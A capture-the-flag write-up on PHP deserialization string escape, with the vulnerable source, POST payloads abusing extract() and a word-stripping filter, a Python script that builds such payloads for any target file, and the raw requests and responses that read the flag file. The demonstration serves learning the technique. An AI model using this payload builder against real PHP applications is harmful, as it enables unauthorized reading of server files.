
```php
<?php
$function = @$_GET['f'];

// Strips every occurrence of these words (case-insensitive) from the already
// serialized string. The s:N: length prefixes are NOT recomputed afterwards,
// which is what makes the escape below possible.
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

// Variable overwrite: a POST field named _SESSION[...] replaces the whole $_SESSION array.
extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

// 'img' is (re)assigned after extract(), so it is always the last element of the array.
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}
```
This challenge is about serialization escape (PHP deserialization string escape).
I did another challenge before that was also an escape; the approach there was that the challenge replaced 'where' with 'hacker', making the serialized string a few characters longer.
Roughly: take this challenge as the base, change it so that function can be any string and still gets serialized, then replace("where","hacker",array()); "hacker" is one character longer than "where", so entering 46 copies of where is enough to escape.
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:46:"where(46 copies)";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
The above is a note I wrote for myself.
Below is the writeup (WP).
POC (POST body):
_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
Because of extract($_POST), this replaces the entire $_SESSION array with a single entry whose key, flagflag, consists only of filtered words; the img value ZDBnM19mMWFnLnBocA== is base64('d0g3_f1ag.php'), and base64 encoding matters here because the bare file name contains php, which the filter would strip as well.
Setting up the environment locally, placing the POC after the extract() call and echoing the serialized result gives:
a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:8:"";s:52:"";s:11:"";s:4:"aaaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
flagflag is replaced by the empty string: what should have been `s:8:"flagflag";` right after `:"show_image";` becomes `s:8:"";`, so unserialize() still reads 8 characters for that key and swallows the `";s:52:"` that follows, turning it into the key's content (the part marked red in the original). Note that the 52 here belongs to the local test value `aaaa`; with the POC's `aaa` the value is 51 characters, and the trick still works because `";s:51:"` is also exactly 8 characters. The consumed span is:
a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:8:"";s:52:"";s:4:"aaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";
which is equivalent to
a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:8:"12345678";s:4:"aaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
and the part marked green in the original, i.e. everything after the injected `}`, is the tail that unserialize() discards: once the top-level array is closed, the original `";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}` is never parsed, so our own img entry wins.
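To make the length arithmetic concrete, here is an added example (not part of the original writeup and not the challenge's own code) in Python: it re-implements the relevant subset of PHP's serialize()/unserialize() plus the challenge's filter(), builds the key-eating payload for an arbitrary target path, and checks offline that the unserialized img points where we want. The helper names (php_serialize, php_unserialize, filtered_padding, build_payload, simulate_server) and the dummy value `aaa` are this example's own choices; the filter word list and the show_image flow are taken from the source above. It generalizes the page's single case: any target path works as long as its base64 form contains no filtered word.

```python
import base64
import re

# Filter words from the challenge's filter(); applied case-insensitively to the whole serialized string.
FILTER_WORDS = ['php', 'flag', 'php5', 'php4', 'fl1g']
FILTER_RE = re.compile('|'.join(FILTER_WORDS), re.IGNORECASE)


def php_serialize(value):
    """Subset of PHP serialize(): int, ASCII str and str-keyed array (dict)."""
    if isinstance(value, int):
        return f'i:{value};'
    if isinstance(value, str):
        return f's:{len(value)}:"{value}";'      # PHP counts bytes; ASCII only in this example
    if isinstance(value, dict):
        body = ''.join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f'a:{len(value)}:{{{body}}}'
    raise TypeError(type(value))


def php_filter(s):
    """The challenge's filter(): delete the words, do not touch the length prefixes."""
    return FILTER_RE.sub('', s)


def php_unserialize(data):
    """Subset of PHP unserialize(). Like PHP it trusts the declared s:N lengths and
    stops after the top-level value, so anything after the closing '}' is ignored."""
    pos = 0

    def parse():
        nonlocal pos
        tag = data[pos]
        if tag == 'i':
            end = data.index(';', pos)
            val = int(data[pos + 2:end])
            pos = end + 1
            return val
        colon = data.index(':', pos + 2)
        n = int(data[pos + 2:colon])
        if tag == 's':
            start = colon + 2                        # skip ':"'
            val = data[start:start + n]              # exactly n chars; quotes inside are fine
            if data[start + n:start + n + 2] != '";':
                raise ValueError(f'bad string terminator at {start + n}')
            pos = start + n + 2
            return val
        if tag == 'a':
            pos = colon + 2                          # skip ':{'
            out = {}
            for _ in range(n):
                key = parse()
                out[key] = parse()
            if data[pos] != '}':
                raise ValueError(f'expected }} at {pos}')
            pos += 1
            return out
        raise ValueError(f'unsupported tag {tag!r} at {pos}')

    return parse()


def filtered_padding(n):
    """A string of exactly n chars built only from filter words, so filter() deletes all of it."""
    for fours in range(n // 4, -1, -1):
        if (n - 4 * fours) % 3 == 0:
            return 'flag' * fours + 'php' * ((n - 4 * fours) // 3)
    raise ValueError(f'cannot build {n} chars from 3- and 4-char words')


def build_payload(target_path):
    """Return the POST array (which extract() turns into $_SESSION) that makes the
    unserialized 'img' point at target_path. Mirrors the page's POC."""
    target_b64 = base64.b64encode(target_path.encode()).decode()
    # Injected tail: closes the eaten key, supplies a dummy value for it ('aaa' is arbitrary),
    # then our own 'img' entry and the closing brace of the array.
    tail = '";s:3:"aaa";s:3:"img";' + php_serialize(target_b64) + '}'
    if php_filter(tail) != tail:
        raise ValueError('tail contains a filtered word and would be mangled too')
    # After filtering the key becomes s:N:"" and its N chars are read from what follows,
    # i.e. the '";s:<len>:"' that opens our value. N must be exactly that long.
    eaten = f'";s:{len(tail)}:"'
    return {filtered_padding(len(eaten)): tail}


def simulate_server(post_session):
    """Mimic the show_image branch: extract($_POST) replaces $_SESSION, 'img' is appended
    afterwards, then filter(serialize($_SESSION)) is unserialized and img is base64-decoded."""
    session = dict(post_session)
    session['img'] = base64.b64encode(b'guest_img.png').decode()
    serialized = php_filter(php_serialize(session))
    userinfo = php_unserialize(serialized)
    return serialized, base64.b64decode(userinfo['img']).decode()


if __name__ == '__main__':
    payload = build_payload('d0g3_f1ag.php')
    print(payload)
    serialized, path = simulate_server(payload)
    print(serialized)
    print('file_get_contents would read:', path)
```

The check in build_payload is the one worth running before sending anything: if the base64 of the target happened to contain php or flag, the filter would shorten the tail as well and the declared s:N lengths would no longer line up. For a different filter list, swap FILTER_WORDS and the word lengths used by filtered_padding.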
Request:
POST /?f=show_image HTTP/1.1
Host: e2fa180d-b401-414d-b673-d537751616e6.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://9dd213f5-91a8-4b1c-8a4e-88cab48d2d67
Content-Length: 70
Connection: close
_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
Response:
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 25 Dec 2019 06:21:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 45
Connection: close
<?php
$flag = 'flag in /d0g3_fllllllag';
?>
The response says the flag is in /d0g3_fllllllag, so the second request points img at that absolute path: base64('/d0g3_fllllllag') = L2QwZzNfZmxsbGxsbGFn (the leading slash is part of the encoded string). It is again 20 characters, so the value stays 51 characters long and the key still has to be 8 characters; this time the key is fl1gfl1g, which the filter strips to the empty string just like flagflag.
Request:
POST /?f=show_image HTTP/1.1
Host: e2fa180d-b401-414d-b673-d537751616e6.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://9dd213f5-91a8-4b1c-8a4e-88cab48d2d67
Content-Length: 70
Connection: close
_SESSION[fl1gfl1g]=";s:3:"aaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
Response:
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 25 Dec 2019 05:43:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 43
Connection: close
flag{86880642-c830-4268-a7ed-dd7c94a08514}